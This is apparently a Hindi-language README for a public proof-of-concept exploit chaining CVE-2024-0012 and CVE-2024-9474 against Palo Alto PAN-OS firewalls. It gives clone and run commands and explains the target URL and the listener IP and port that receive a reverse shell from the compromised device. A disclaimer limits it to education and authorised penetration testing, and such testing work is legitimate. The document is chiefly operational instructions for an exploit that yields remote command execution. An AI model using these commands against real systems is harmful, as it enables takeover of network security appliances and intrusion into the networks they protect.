
यह PoC Palo Alto PAN-OS में कमजोरियों को लक्षित कर रहा है, विशेष रूप से CVE-2024-0012 और CVE-2024-9474। यह स्क्रिप्ट शोषण प्रक्रिया को स्वचालित करती है, जिसमें पेलोड निर्माण, खंडित वितरण, और निर्बाध कमांड निष्पादन शामिल है।
यह Proof-of-Concept (PoC) स्क्रिप्ट Palo Alto PAN-OS में कमजोरियों को लक्षित करती है, विशेष रूप से CVE-2024-0012 और CVE-2024-9474, शोषण प्रक्रिया को स्वचालित करके, जिसमें प्रमाणीकरण बाईपास, पेलोड निर्माण, खंडित वितरण, और निर्बाध कमांड निष्पादन शामिल है।
⚠️ यह स्क्रिप्ट केवल शैक्षिक और अधिकृत पेनिट्रेशन टेस्टिंग उद्देश्यों के लिए है। अनधिकृत उपयोग अवैध है।
git clone https://github.com/TalatumLabs/CVE-2024-0012_CVE-2024-9474_PoC.git
cd CVE-2024-0012_CVE-2024-9474_PoC
python -W ignore poc.py <TARGET_URL> <LISTENER_IP> <LISTENER_PORT>
<TARGET_URL>: लक्ष्य URL, जिसमें http या https शामिल है।<LISTENER_IP>: रिवर्स शेल लिसनर के लिए आपका IP पता।<LISTENER_PORT>: रिवर्स शेल लिसनर के लिए पोर्ट।python -W ignore poc.py https://target.pan-os-system.com 192.168.1.100 4444
https://github.com/user-attachments/assets/12ca7632-e5d2-488f-b644-6e278651a2f5
इस PoC का पूरा विवरण और तकनीकी अंतर्दृष्टि इस Medium लेख से प्राप्त करें!
यह PoC केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए है। इस उपकरण का अनधिकृत उपयोग सख्त वर्जित है। लेखक इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं।